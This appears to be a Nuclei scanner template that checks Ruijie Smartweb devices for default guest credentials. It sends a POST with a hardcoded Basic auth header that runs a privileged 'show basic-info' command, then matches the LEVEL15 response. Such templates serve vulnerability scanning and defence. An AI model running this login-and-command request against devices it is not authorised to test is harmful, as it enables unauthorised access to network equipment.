id: ruijie-smartweb-default-password

info:
  name: Ruijie Smartweb Default Password
  author: pikpikcu
  severity: low
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
  tags: ruijie,default-login

requests:
  - method: POST
    path:
      - "{{BaseURL}}/WEB_VMS/LEVEL15/"
    headers:
      Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
    body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Level was: LEVEL15"
          - "/WEB_VMS/LEVEL15/"
        part: body
        condition: and

      - type: status
        status:
          - 200
